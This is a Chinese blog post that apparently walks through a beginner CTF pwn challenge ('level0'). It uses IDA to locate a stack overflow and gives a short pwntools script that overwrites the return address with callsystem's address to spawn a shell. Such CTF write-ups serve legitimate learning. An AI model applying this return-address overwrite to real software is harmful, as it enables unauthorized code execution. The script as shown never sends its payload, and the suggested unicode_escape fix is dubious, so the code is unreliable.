level0-pwn题目新手营第二题做题思路总结

最新推荐文章于 2024-04-20 23:07:57 发布
最新推荐文章于 2024-04-20 23:07:57 发布
阅读量243 收藏 1
点赞数
分类专栏: vmware相关知识 Python学习笔记 PWN学习笔记 文章标签: python shell pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117558274
版权

终于做到第二题啦,继续加油!(当然还是先跟着大佬的步骤学习人家是咋做的,然后再总结一下自己做题出现的问题)

首先先下载附件,使用IDA进行F5,观察程序代码,先看下main、callsystem、vulnerable_function()这几个函数(在IDA界面的左侧Function name那边),根据vulnerable_function()中的read函数中 buf,可能会存在栈溢出

而callsystem中有return 返回的是/bin/sh,所以根据大佬们的解题思路:就是将buf的数据填充垃圾数据后,是其指向callsystem的地址,这样就可以进入 system(“/bin/sh”),调用system打开了一个shell

所以下面先看buf 和 callsystem的地址:

通过点击buf 可以看到其地址是 -0000000000000080 ,而return在:+0000000000000008  

这样两者就是差 0x88 个位置

然后再加入call的地址来调用shell,下面找到call的地址:

双击在function name中的callsystem,然后会出现

这里的starts at 400596就是callsystem的地址

所以使用payload = ‘a’*0x88 + p64(callsystem的地址) 这里就是400596 这是核心代码

所以python脚本可以这么写:

 from pwn import*                                        
 p = remote('111.200.241.244',56471)
 call_system = 0x400596
 payload =0x88*'A' + p64(call_system)
 p.interactive()

这里的remote是远程连接的意思,process是本地连接,好像是因为是调shell本地运行不出flage,只能在线运行。

这里的IP地址和端口号都是通过点击获取题目场景出现的,每台电脑都不一样的

当然我这里把大佬们的代码又比着敲上以后,还是出现了问题:

通过一番查找资料,终于又有大佬帮我解决了!

要在p64()之后添加  .decode('unicode_escape')

 from pwn import*                                        
 p = remote('111.200.241.244',56471)
 call_system = 0x400596
 payload =0x88*'A' + p64(call_system).decode('unicode_escape')
 p.interactive()

然后保存(esc -> 输入冒号 -> wq)再执行一下就可以了(如果有不清楚这边怎么操作的,上一篇博客里有详细步骤,一起加油鸭!)

参照上图运行以后,ls一下,会出现flag,使用cat flag 命令就会出现flag啦 (继续加油鸭!)

总结一下:虽然刚开始两个题目wp都是看的别人的,但是终于算是有了点思路,学会了点操作,继续努力!

努力努力更努力NA
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn核心解技巧(1)
Shangku92的博客
06-07 661
*pip qinghuayuan ::pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple *enevrionment: **libc: getlibc: #get libc versions ./update_list & cat list #download libcversion(in list) addldtolib64: #进入64位的目录 glibc 32位就 cd /lib cd...
CTF 一次PWN的小技巧
顶峰
03-28 1105
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。
PWN完整出流程(GCC编译ELF文件,搭建GZ:CTF平台,基于CTF-Xined部署题目至GZ:CTF平台)
最新发布
流水不争先,争的是滔滔不绝
04-20 1528
GCC编译C源文件至ELF可执行文件,利用docker搭建开源GZ:CTF赛事平台,基于github开源项目CTF-xined部署pwn至GZ:CTF平台。一次完整实现从C源码开始到题目部署平台的pwn全流程详解
PWN[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4277
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
新手pwn
m0_74736832的博客
07-05 961
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
pwn入门小技巧
qq_36918532的博客
05-24 2672
目前我所遇到的一些pwn做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
ctf库ctf-pwn收集
03-31
ctf库 CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
level0 -- 攻防世界新手
01-19
来自攻防世界的pwn,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问。漏洞利用问解决链接:...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF【pwn】解记录(1-3页已完结)
Assassin
05-05 1898
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
做的第一道pwn
LL021101的博客
03-20 1230
做题步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
Ctfshow pwn 02(自己做出的第一道pwn
weixin_64875092的博客
12-05 5274
算是一篇第一次做出pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
xctf攻防世界pwn基础解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell算是做pwn的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到pythonpwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
ctf pwn题目的部署
giantbranch的专栏
09-17 7162
目录使用socat部署使用pwn_deploy部署使用pwn_deploy部署 使用socat部署 安装 apt install socat 模板:socat tcp-listen:port,fork exec:./程序名,reuseaddr 实例:socat tcp-listen:10001,fork exec:./pwn1,reuseaddr 使用pwn_deploy部署 https://g...
使用p64()时报错:TypeError: can only concatenate str (not “bytes“) to str
qq_39772215的博客
11-28 1916
使用p64()时报错:TypeError: can only concatenate str (not “bytes”) to str 解决: 在后面加上 decode(‘unicode_escape’) 如: p64(0x00400596).decode('unicode_escape')
ctf中pwn题目总结
weixin_41038905的博客
11-16 4695
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
mqtt-pwn安装
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值